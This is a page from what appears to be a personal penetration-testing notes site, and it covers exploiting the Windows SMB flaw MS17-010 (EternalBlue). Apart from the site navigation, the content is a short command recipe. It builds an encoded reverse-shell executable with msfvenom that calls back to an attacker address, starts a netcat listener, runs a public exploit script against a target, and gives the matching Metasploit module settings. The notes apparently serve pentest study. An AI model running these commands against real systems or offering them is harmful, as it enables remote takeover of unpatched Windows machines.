yuyudhn's notes
  • About
  • 🚉QUICKSTART
    • Prerequisite
    • Reconnaissance
    • Exploitation
    • Post Exploitation
    • ⛈️Misc
  • 🪟Active Directory
    • Basic Command
    • Enumeration
      • PowerView
    • Service Exploitation
      • LDAP
      • SMB
        • MS17-010
      • MSSQL
    • Privilege Escalation
      • Unquoted Service Path
      • UAC Bypass
      • Token Abuse
    • Post Exploitation
      • Tunneling with Ligolo-ng
    • Credential Hunting
      • Group Policy Preferences
      • DPAPI
  • MITRE ATT&CK
    • Defense Evasion
      • Physical Attack: Remove EDR
      • AMSI Bypass
    • Credential Access
      • Dump SAM Hashes via Registry
  • 🐧Linux
    • Misc
    • Linux Post Exploitation
    • Linux Password Hunting
  • 🐚Backdoor Stuff
    • Simple PHP Webshell
    • MSFvenom Generate Payload
  • 📳Mobile Pentest: iOS
    • iOS Penetration Testing
    • Objection
  • 🕸️Web Application
    • Common Applications
      • Tomcat
      • Joomla
    • SSTI
    • File Inclusion
    • XSS
    • Misc
  • 🖊️Machine Writeup
    • HackTheBox
      • Perfection
      • Pilgrimage
      • PC
      • Shoppy
      • GoodGames
      • Photobomb
      • Support
Powered by GitBook
On this page

Was this helpful?

  1. Active Directory
  2. Service Exploitation
  3. SMB

MS17-010

SMB Exploit MS17-010

Some tools to exploiting Eternalblue

Exploiting MS17-010

msfvenom -p windows/shell_reverse_tcp -f exe -o asuka.exe \
-a x86 -e x86/shikata_ga_nai LHOST=192.168.100.1 LPORT=31337

# run nc from attacker
nc -lvp 31337

# exploiting the vulnerability
git clone https://github.com/helviojunior/MS17-010
cd MS17-010
python send_and_execute.py target.lab asuka.exe

# In case the dependency is missing
wget https://bootstrap.pypa.io/pip/2.7/get-pip.py
python2 get-pip.py
pip2 install impacket==0.9.22

Or using Metasploit

use exploit/windows/smb/ms17_010_eternalblue
show options
set LHOST 10.4.33.242
set RHOSTS 10.10.82.157
run
PreviousSMBNextMSSQL

Last updated 8 months ago

Was this helpful?

🪟